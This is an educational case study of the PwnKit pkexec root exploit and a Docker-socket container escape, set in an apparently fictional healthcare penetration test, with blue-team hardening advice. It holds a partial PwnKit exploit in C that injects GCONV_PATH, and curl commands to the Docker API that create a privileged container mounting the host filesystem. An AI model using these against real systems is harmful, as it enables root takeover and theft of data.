Case Study 2: PwnKit (CVE-2021-4034) and Container Escapes in Production

When Polkit Met Root, and Containers Failed to Contain


Part I: PwnKit --- Twelve Years of Root in Plain Sight

Overview

In January 2022, the Qualys Research Team disclosed CVE-2021-4034, dubbed "PwnKit"---a local privilege escalation vulnerability in polkit's pkexec utility that had existed since its first release in May 2009. For over twelve years, every major Linux distribution shipped with a binary that any local user could exploit to gain root access. The vulnerability was trivially exploitable, worked on default installations, and required no special configuration.

What Is Polkit?

PolicyKit (polkit) is an authorization framework used by Linux distributions to manage privileges for unprivileged processes. The pkexec component allows an authorized user to execute a program as another user---similar to sudo but integrated with the desktop policy framework. Critically, pkexec is installed as a SUID-root binary on virtually every Linux system.

The Vulnerability

The vulnerability lay in pkexec's handling of command-line arguments. pkexec walks argv (the argument array) starting at index 1, on the assumption that argc (the argument count) is at least 1 and argv[0] holds the program name. Nothing guaranteed that assumption: the C standard allows argc to be 0, and Linux's execve() accepted an empty argument array, so a program could be started with no arguments at all, not even its own name.

When pkexec is called with argc=0:

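  1. pkexec's argument loop starts at index 1 and never runs, so the code goes on to read argv[1] as the program to execute. With argc=0, argv[0] is the terminating NULL and argv[1] lies past the end of the array. Because the kernel places the envp array (environment variables) immediately after argv in memory, argv[1] is actually envp[0], and the first environment variable is treated as the program path.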

  2. pkexec then calls g_find_program_in_path() to resolve the "program name" (actually the first environment variable) to a full path.

  3. The resolved path is written back to argv[1]---but since argv has zero elements, this actually writes into envp[0], allowing the attacker to inject an environment variable.

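  4. By carefully constructing the environment, an attacker can inject a value like GCONV_PATH=/tmp/exploit into the environment of the SUID-root pkexec process. This matters because the dynamic loader normally strips dangerous variables such as GCONV_PATH from the environment of SUID programs before main() runs; the out-of-bounds write reintroduces one after that sanitization.

  5. The GCONV_PATH environment variable controls where glibc looks for character conversion modules. By pointing it to an attacker-controlled directory containing a malicious shared library, the attacker achieves code execution as root as soon as pkexec performs a character-set conversion, for example while printing an error message.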
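The memory layout behind steps 1 and 3 can be checked with a few lines of C. The sketch below is illustrative only: the function names envp_follows_argv and argv_is_usable are made up for this example and do not appear in polkit. The first tests whether the environment array begins in the slot right after argv's terminating NULL, which is what makes argv[1] alias envp[0] when argc is 0. The second is a guard similar in spirit to the upstream fix, which exits early when argc is less than 1.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Returns 1 when envp starts in the slot immediately after argv's
 * terminating NULL (argv[argc]). In that layout argv[argc + 1] and
 * envp[0] are the same pointer slot, so with argc == 0 a read or write
 * of argv[1] really touches envp[0].
 * Hypothetical helper for illustration; not part of polkit.
 */
int envp_follows_argv(int argc, char **argv, char **envp)
{
    assert(argc >= 0 && argv != NULL && envp != NULL);
    return argv + argc + 1 == envp;
}

/*
 * Defensive check: refuse to continue when the caller supplied an
 * empty argument vector, instead of assuming argv[0] is a program name.
 * Hypothetical helper for illustration; not part of polkit.
 */
int argv_is_usable(int argc, char **argv)
{
    return argc >= 1 && argv != NULL && argv[0] != NULL;
}
```

Called as envp_follows_argv(argc, argv, envp) from a main(int argc, char **argv, char **envp) on Linux, the first function is expected to return 1, although the three-argument form of main is a common extension rather than standard C. A SUID program would call something like argv_is_usable() before touching argv and exit immediately if it returns 0.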

Exploitation

The exploit is remarkably simple and reliable:

// Simplified PwnKit exploit concept (illustrative; not a complete exploit)
// The actual exploit involves:
// 1. Creating a malicious gconv-modules file
// 2. Creating a malicious shared library
// 3. Setting up the environment to trigger the out-of-bounds write
// 4. Executing pkexec with argc=0 using execve()

#include <unistd.h>

int main(void) {
    // argv holds only the terminating NULL, so argc is 0
    char *argv[] = { NULL };

    // Set up environment for exploitation
    char *envp[] = {
        "exploit",                    // envp[0]: read out of bounds as argv[1]
        "PATH=GCONV_PATH=/tmp/lol",  // Makes the resolved path begin with "GCONV_PATH="
        "CHARSET=UTF8",
        "SHELL=bash",
        NULL
    };

    // Execute pkexec with argc=0
    // envp[0] is treated as the "program name"; the path resolved for it
    // is written back over envp[0], which injects GCONV_PATH
    execve("/usr/bin/pkexec", argv, envp);
    return 1;  // Reached only if execve() fails
}

The exploitation was so straightforward that working exploits appeared within hours of disclosure.

Impact and Response

PwnKit affected every Linux distribution that included polkit:

  • Ubuntu 10.04 through 21.10
  • Debian since 2009
  • Red Hat/CentOS 6, 7, 8, and 9
  • Fedora since 2009
  • SUSE/openSUSE since 2009
  • Arch Linux and derivatives

Emergency patches were released by all major distributions within 24-48 hours. Where patching had to wait, the stopgap was to remove the SUID bit from pkexec, which blocks the exploit but also disables pkexec for non-root users:

chmod 0755 /usr/bin/pkexec
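Whether the mitigation actually took effect on a given host can be verified by inspecting the file mode. The following is a minimal sketch, assuming a POSIX system; has_setuid_bit is a hypothetical helper name chosen for this example, not an existing tool or library function.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stddef.h>
#include <sys/stat.h>

/*
 * Returns 1 if the file at path has the set-user-ID bit, 0 if it does
 * not, and -1 if the file cannot be examined (for example, it is absent).
 * Hypothetical helper for illustration.
 */
int has_setuid_bit(const char *path)
{
    struct stat st;

    assert(path != NULL);
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}
```

After the chmod above, has_setuid_bit("/usr/bin/pkexec") should return 0. A result of 1 on any host means the stopgap was never applied there, which is the condition found on the staging server in the next section.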

The MedSecure Connection

During the MedSecure penetration test, the team found that several development and staging servers had not been patched for PwnKit months after disclosure. One staging server running Ubuntu 18.04 had pkexec with the SUID bit still set:

www-data@medsecure-staging:~$ ls -la /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 31 2021 /usr/bin/pkexec

www-data@medsecure-staging:~$ ./pwnkit
# id
uid=0(root) gid=0(root)

The escalation took less than a second. The finding highlighted a systemic failure: MedSecure's patch management process did not adequately cover non-production systems, which often contain copies of production data for testing purposes.


Part II: Container Escapes in MedSecure's Kubernetes Environment

The Scenario

MedSecure's modern patient portal runs in a Kubernetes cluster on AWS EKS. The development team containerized the application for scalability and what they believed was improved security. During the penetration test, the team discovered that the container security posture had critical gaps.

Discovery: Docker Socket Exposure

After gaining initial access to a pod through a server-side request forgery (SSRF) vulnerability in the patient portal API, the team enumerated the container environment:

# Container detection
www-data@patient-portal-pod:/$ ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 Jan 15 10:23 /.dockerenv

# Kubernetes service account
www-data@patient-portal-pod:/$ ls /var/run/secrets/kubernetes.io/serviceaccount/
ca.crt  namespace  token

# Critical finding: Docker socket mounted
www-data@patient-portal-pod:/$ ls -la /var/run/docker.sock
srw-rw---- 1 root 999 0 Jan 15 10:00 /var/run/docker.sock

The Docker socket was mounted into the pod---a dangerous but common practice used by CI/CD pipelines and monitoring tools. The development team had included it for a container health-check sidecar that needed to inspect other containers.
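The same check the testers ran by hand can be automated as part of a container self-audit. The sketch below assumes a POSIX system; is_unix_socket is a hypothetical helper name introduced for this example. It only reports whether a path is a Unix domain socket and does not talk to the Docker API.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stddef.h>
#include <sys/stat.h>

/*
 * Returns 1 if path exists and is a Unix domain socket, 0 if it exists
 * but is some other file type, and -1 if it cannot be examined.
 * Hypothetical helper for illustration.
 */
int is_unix_socket(const char *path)
{
    struct stat st;

    assert(path != NULL);
    if (stat(path, &st) != 0)
        return -1;
    return S_ISSOCK(st.st_mode) ? 1 : 0;
}
```

Inside a workload container, is_unix_socket("/var/run/docker.sock") returning 1 is a finding worth alerting on, since an application pod rarely has a legitimate reason to reach the container runtime.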

The Escape

With access to the Docker socket, the escape was straightforward:

# Install curl (or use a pre-compiled static binary)
# Query the Docker API
www-data@patient-portal-pod:/$ curl -s --unix-socket /var/run/docker.sock \
  http://localhost/images/json | head -5

# Create a privileged container mounting the host filesystem
# (bind mounts belong under HostConfig in the create request)
www-data@patient-portal-pod:/$ curl -s --unix-socket /var/run/docker.sock \
  -X POST -H "Content-Type: application/json" \
  -d '{
    "Image":"alpine",
    "Cmd":["/bin/sh"],
    "HostConfig":{
      "Privileged":true,
      "Mounts":[{"Type":"bind","Source":"/","Target":"/host"}]
    }
  }' \
  http://localhost/containers/create

# Start and attach to the container
# Now we have root on the host via /host

Lateral Movement Through Kubernetes

With host access, the team extracted the kubelet credentials and discovered that the pod's Kubernetes service account token had excessive permissions:

# Check permissions
$ kubectl auth can-i --list
Resources   Verbs
*.*         [*]        # Full cluster admin!

The service account had been granted cluster-admin privileges---a catastrophic misconfiguration that gave the team access to every pod, secret, and namespace in the cluster.

Impact Demonstration

From the compromised cluster, the team demonstrated access to:

  1. Database credentials stored in Kubernetes Secrets (base64-encoded, not encrypted)
  2. Patient health records in the database accessed through internal service endpoints
  3. AWS IAM credentials via the Instance Metadata Service (IMDS) accessible from the host
  4. Other microservices including the billing system and prescription management
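The first item deserves emphasis: base64 is an encoding, not encryption, so anyone who can read a Secret can recover its value without a key. The short decoder below illustrates this. It is a sketch written for this example (b64_value and b64_decode are hypothetical names), and the sample value used in the usage note is made up, not taken from the MedSecure engagement.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Maps one base64 character to its 6-bit value, or -1 if invalid. */
static int b64_value(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/*
 * Decodes standard base64 text into out and NUL-terminates the result.
 * Returns the number of decoded bytes, or -1 on invalid input or if
 * out is too small. No key or secret is involved at any point.
 */
long b64_decode(const char *in, char *out, size_t out_size)
{
    unsigned long acc = 0;  /* bit accumulator */
    int bits = 0;           /* number of pending bits in acc */
    size_t n = 0;           /* bytes written so far */

    assert(in != NULL && out != NULL);
    for (; *in != '\0' && *in != '='; in++) {
        int v = b64_value(*in);
        if (v < 0)
            return -1;
        acc = (acc << 6) | (unsigned long)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n + 1 >= out_size)      /* keep room for the NUL */
                return -1;
            out[n++] = (char)((acc >> bits) & 0xFF);
            acc &= (1UL << bits) - 1;   /* drop the bits just emitted */
        }
    }
    if (n >= out_size)
        return -1;
    out[n] = '\0';
    return (long)n;
}
```

Decoding the made-up value "cGFzc3dvcmQ=" with b64_decode() yields the eight-byte string "password". This is why encryption at rest and tight RBAC on Secrets matter: the encoding itself provides no confidentiality.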

The complete attack chain: SSRF in web application -> Pod access -> Docker socket -> Host access -> Kubernetes admin -> All patient data.

Root Cause Analysis

Multiple security failures contributed to the breach:

  1. Docker socket mounting: The socket was mounted for a convenience feature (container health checks) without understanding the security implications.
  2. Excessive Kubernetes RBAC: The service account had cluster-admin instead of the minimum necessary permissions.
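  3. No pod security enforcement: The cluster did not enforce Pod Security Standards. The Baseline and Restricted profiles reject hostPath volumes and privileged pods, so the pod that mounted the Docker socket would have been refused at admission.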
  4. Secrets not encrypted: Kubernetes Secrets were stored in etcd without encryption at rest.
  5. No network segmentation: Network policies were not implemented, allowing unrestricted pod-to-pod communication.
  6. IMDS not restricted: The AWS Instance Metadata Service was accessible from pods, allowing credential theft.

🔵 Blue Team Perspective

Container Security Best Practices

Never mount the Docker socket:

  • Use dedicated monitoring tools that do not require socket access
  • If socket access is absolutely necessary, use a read-only proxy with strict filtering
  • Consider alternatives like cri-o or containerd that provide more granular access controls

Kubernetes Hardening:

  • Implement Pod Security Standards (Restricted profile)
  • Use RBAC with least privilege; never grant cluster-admin to service accounts
  • Enable audit logging for all API server operations
  • Encrypt Secrets at rest using KMS
  • Implement Network Policies to restrict pod-to-pod communication
  • Block IMDS access from pods using iptables rules or by requiring IMDSv2 with a hop limit of 1

Runtime Security:

  • Deploy Falco or similar runtime security monitoring
  • Alert on container escapes, privilege escalation attempts, and anomalous network activity
  • Implement image scanning in CI/CD pipelines
  • Use distroless or scratch base images to minimize attack surface

PwnKit-Specific Defenses:

  • Implement automated patch management for all systems, including non-production
  • Remove SUID bits from binaries that are not strictly necessary
  • Monitor for new SUID binaries appearing on systems
  • Use file integrity monitoring for critical system binaries

Discussion Questions

  1. PwnKit existed for twelve years before discovery. What does this tell us about the effectiveness of code review and static analysis for finding memory safety bugs in C code?
  2. Should the Docker socket ever be mounted inside a container? What alternatives exist for common use cases?
  3. How would the MedSecure container escape have been prevented if Pod Security Standards (Restricted) had been enforced?
  4. What is the business impact of a container escape that exposes 500,000 patient health records?
  5. How should organizations balance the convenience of broad Kubernetes RBAC permissions against the security risk?

Key Lessons

  1. Vulnerability age does not equal low risk: PwnKit went unnoticed for over twelve years and Dirty COW for roughly nine. Age does not make a vulnerability safe.
  2. Containers are not a security boundary without additional controls: Docker and Kubernetes provide isolation, but misconfigurations easily defeat it.
  3. Non-production environments need production-level security: Staging servers often contain production data and can serve as pivot points.
  4. Defense in depth is essential: No single control (containers, firewalls, access controls) is sufficient on its own.
  5. The attack chain matters: The combination of individually "minor" issues (SSRF + Docker socket + excessive RBAC) created a critical impact.

References

  • Qualys Security Advisory: "PwnKit: Local Privilege Escalation in polkit's pkexec" (QSA-2022-0002)
  • CVE-2021-4034 National Vulnerability Database Entry
  • Docker Security Best Practices Documentation
  • Kubernetes Pod Security Standards (https://kubernetes.io/docs/concepts/security/pod-security-standards/)
  • Trail of Bits: "Understanding Docker Container Escapes"
  • NIST SP 800-190: Application Container Security Guide
  • CIS Kubernetes Benchmark